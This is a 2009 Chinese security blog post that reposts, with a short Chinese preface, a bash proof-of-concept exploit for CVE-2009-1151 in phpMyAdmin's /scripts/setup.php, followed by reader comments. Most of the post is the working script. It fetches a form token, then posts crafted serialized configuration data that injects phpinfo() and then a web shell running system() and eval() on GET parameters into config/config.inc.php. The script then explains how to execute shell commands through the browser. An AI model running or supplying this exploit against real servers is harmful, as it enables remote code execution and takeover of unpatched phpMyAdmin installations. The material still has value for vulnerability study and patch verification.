首页 > 网络安全 > phpMyAdmin (/scripts/setup.php) PHP 注入代码

phpMyAdmin (/scripts/setup.php) PHP 注入代码

      此漏洞代码在以下环境测试通过:
      phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;
      Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
      攻击环境要求:
      phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;
      此漏洞只针对采用向导模式安装的phpMyAdmin有效,而对采用手动安装的无效;
      管理员必须未删除"/phpMyAdmin/"目录下的"/config/"子目录,因为"/scripts/setup.php"尝试创建的下面PHP代码注入的"config.inc.php"文件正是在这个子目录下。

复制内容到剪贴板程序代码程序代码
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi

if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
           echo "on Debian/Ubuntu: sudo apt-get install curl"
           exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    
    echo "[+] attempting to inject phpinfo() …"
    curl -ks -b $2 -d "$postdata" –url "$3/scripts/setup.php" >/dev/null

    if curl -ks –url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks –url "$3/config/config.inc.php" >$flag    
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b $2 -d $postdata2 –url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo "    $3/config/config.inc.php?c=ls+-l+/"
        echo "    $3/config/config.inc.php?p=phpinfo();"
        echo "    please send any feedback/improvements for this script to"\
        "unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit
    fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar –url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided …"

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
    length=`echo -n $token | wc -c`

    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit $token $cookiejar $1
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi

# milw0rm.com [2009-06-09]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/179

  1. 0point
    0point 6月 12th, 2009 @ 09:32 | #-31

    老卢放心好了,我只是从国外的漏洞网站milw0rm.com挑选一部分高危漏洞及代码顺便做部分翻译,拿站早就不研究了。

  2. 卢松松
    卢松松 6月 11th, 2009 @ 22:11 | #-32

    开始研究这个了??希望用在正道

  3. 海天无影
    海天无影 6月 10th, 2009 @ 23:16 | #-33

    呵呵网络是不安全的

评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks